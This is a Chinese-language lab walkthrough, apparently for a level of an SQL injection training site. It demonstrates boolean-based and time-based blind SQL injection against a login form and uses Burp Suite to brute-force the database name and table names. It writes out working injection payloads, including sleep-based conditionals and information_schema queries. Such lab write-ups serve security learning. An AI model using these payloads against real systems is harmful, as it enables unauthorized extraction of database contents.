知识点：

• 布尔盲注
• 时间盲注

布尔盲注

通过admin admin登录发现没有任何回显信息；但是使用的是成功登录的图片

随便输入一个用户和密码发现出现了错误登录的图片信息

构造username=a'#

感觉又是一个布尔注入

构造payload:username=a'+or+1=1#

发现登录失败的界面

正常登录使用flag图片，错误登录使用slap图片；感觉这里是可以区分的；应该是我的payload不对

经过不断的尝试发现原始语句为 where username = ("输入")

构造payload:username=a")+or+1=1# 

成功登录，回显界面变了；说明这里可以使用bool注入（那么下面的流程和第十一关一模一样了）

时间盲注

由于该关提示用的是时间盲注，那么就是用时间盲注来操作了

通过bp进行抓包，构造时间盲注的payload:username=a")+or+if(1=1,sleep(2),1)#

发现页面卡住了；说明执行了sleep(2)

尝试改变payload:username=a")+or+if(1=0,sleep(2),1)#

发现页面响应迅速，直接返回了响应包；说明这里存在注入点；可以用时间注入进行操作

同样的方法获取对应的数据库长度；(这里需要不断的进行尝试)

构造payload:username=a")+or+if(length(database())=8,sleep(2),1)#

页面加载中，成功获取到了数据库长度为8

接下来利用时间盲注进行爆破数据库名

构造payload:username=a")+or+if((mid((database()),1,1)='a'),sleep(3),1)#

将内容放到爆破模块中（具体的设置和之前上一关一样）

需要额外说一下的是在project options设置中改一下timeout的时间；要不然不会触发timeout选项

默认是120s；修改为2s就行了，只要低于sleep()的时间就行了，我用的3s，所以这里设置2s就OK了

点击爆破，成功得到了timeout的数据

通过取消勾选status的所有状态使页面只剩下timeout的数据

通过payload1进行排序就发现了正确的数据库名

接下来同样的操作，爆破处数据库中的表名

构造payload:username=a")+or+if((mid((select+group_concat(table_name)+from+information_schema.tables+where+table_schema='security'),1,1)='e'),sleep(2),1)#

放入爆破模块中，设置不变（这里没测数据长度，我直接用的50，假设目标长度<50，那么结果中有效的payload1不会到50，如果有效payload1到了50说明长度>=50，此时我会增加长度；当然，最好先把长度爆破一下，这样方便下面的数据爆破，我这里相当于偷了个懒，因为知道长度肯定没有50）

开始爆破，获取了结果，同样进行过滤排序；成功获取了所有的表名；根据缺号进行截断字符串；获取完整的表名；这里可以看到payload1只用了29；说明所有表都读取出来了

同样的，读取字段信息和表中的信息使用同样的方法，下面就不演示了，之前的关卡中操作过了，到这里就结束了

10